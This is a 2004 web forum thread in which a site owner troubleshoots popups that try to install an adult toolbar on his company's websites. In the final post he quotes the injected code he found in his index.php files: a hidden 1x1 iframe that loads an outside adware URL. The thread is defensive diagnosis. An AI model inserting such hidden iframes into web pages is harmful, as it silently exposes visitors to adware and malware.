Antivirus Protection
 
Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
User Name:
Password:
Remember me
Go Back   Dev Shed ForumsSystem AdministrationAntivirus Protection

Reply
Add This Thread To:
  Del.icio.us   Digg   Google   Spurl   Blink   Furl   Simpy   Y! MyWeb 
Thread Tools Search this Thread Rate Thread Display Modes
 
Unread Dev Shed Forums Sponsor:
Get inside! Sample the range of functionality easily built with JMSL Library for Time Series Data Analysis, Heat Maps, Portfolio Optimization, Monte Carlo Simulation, Stock Price Charting and more. Download Now!
  #1  
Old May 23rd, 2004, 01:57 AM
[ArcanE]'s Avatar
[ArcanE] [ArcanE] is offline
Contributing User
Dev Shed Newbie (0 - 499 posts)
 
Join Date: Nov 2001
Posts: 74 [ArcanE] User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: 2 h 27 m
Reputation Power: 7
Website hijack

Is it possible that a website completely coded by us is hijacked by some sort of Toolbar installer?

Since last week i got a very annoying popup at almost all of our sites and i don't have any idea where it comes from. It tries to install an XXX toolbar.

I already updated/ran Adaware and Norton Antivirus on my PC and visited the sites on a clean installed laptop but the problem persists.

Anyone has an idea?

http://www.bruggebusiness.com/

Reply With Quote
  #2  
Old May 23rd, 2004, 02:04 AM
jacktasia jacktasia is offline
Contributing User
Dev Shed Intermediate (1500 - 1999 posts)
 
Join Date: Feb 2004
Location: Lawrence, Kansas [KU]
Posts: 1,559 jacktasia User rank is Corporal (100 - 500 Reputation Level)jacktasia User rank is Corporal (100 - 500 Reputation Level)jacktasia User rank is Corporal (100 - 500 Reputation Level)jacktasia User rank is Corporal (100 - 500 Reputation Level) 
Time spent in forums: 2 Days 13 h 57 m 56 sec
Reputation Power: 9
Send a message via AIM to jacktasia
do you see anything weird in any of your website's directories? (i.e.: anything you yourself didn't put there?)
__________________
Jack
---------
use code tags

become vegetarian
python? yes, sir!
unarm.org
get firefox


If I helped you then please click the "" in the upper right-hand corner of my post.

Reply With Quote
  #3  
Old May 23rd, 2004, 02:10 AM
[ArcanE]'s Avatar
[ArcanE] [ArcanE] is offline
Contributing User
Dev Shed Newbie (0 - 499 posts)
 
Join Date: Nov 2001
Posts: 74 [ArcanE] User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: 2 h 27 m
Reputation Power: 7
Quote:
Originally Posted by jacktasia
do you see anything weird in any of your website's directories? (i.e.: anything you yourself didn't put there?)

Nope, Already checked code and content of the FTP, but i just noticed something very ugly ...

Looks like almost all sites hosted on our dedicated server have this problem. Guess i could best contact our system admin

Any other suggestions?

Reply With Quote
  #4  
Old May 23rd, 2004, 02:30 AM
jacktasia jacktasia is offline
Contributing User
Dev Shed Intermediate (1500 - 1999 posts)
 
Join Date: Feb 2004
Location: Lawrence, Kansas [KU]
Posts: 1,559 jacktasia User rank is Corporal (100 - 500 Reputation Level)jacktasia User rank is Corporal (100 - 500 Reputation Level)jacktasia User rank is Corporal (100 - 500 Reputation Level)jacktasia User rank is Corporal (100 - 500 Reputation Level) 
Time spent in forums: 2 Days 13 h 57 m 56 sec
Reputation Power: 9
Send a message via AIM to jacktasia
Quote:
Originally Posted by [ArcanE]
Looks like almost all sites hosted on our dedicated server have this problem. Guess i could best contact our system admin


i would contact him as soon as possible, because i don't think anyone else would be able to fix it.

Reply With Quote
  #5  
Old May 23rd, 2004, 02:46 AM
[ArcanE]'s Avatar
[ArcanE] [ArcanE] is offline
Contributing User
Dev Shed Newbie (0 - 499 posts)
 
Join Date: Nov 2001
Posts: 74 [ArcanE] User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: 2 h 27 m
Reputation Power: 7
Looks like i found the problem. Somehow some malicious code has nested itself inside my index.php files.

<IFRAME SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1 HEIGHT=1></IFRAME>

This code explains the nasty popups.
I'm gonna have to check the workstations at the office if this problem occurred before or after upload. Hope it happened before, else we might be in a very bad situation with a server infected with some nasty adware/troyans

Reply With Quote
Reply

Viewing: Dev Shed ForumsSystem AdministrationAntivirus Protection > Website hijack


Thread Tools  Search this Thread 
Search this Thread:

Advanced Search
Display Modes  Rate This Thread 
Rate This Thread:


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
View Your Warnings | New Posts | Latest News | Latest Threads | Shoutbox
Forum Jump


Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
  
 





© 2003-2008 by Developer Shed. All rights reserved. DS Cluster 1 hosted by Hostway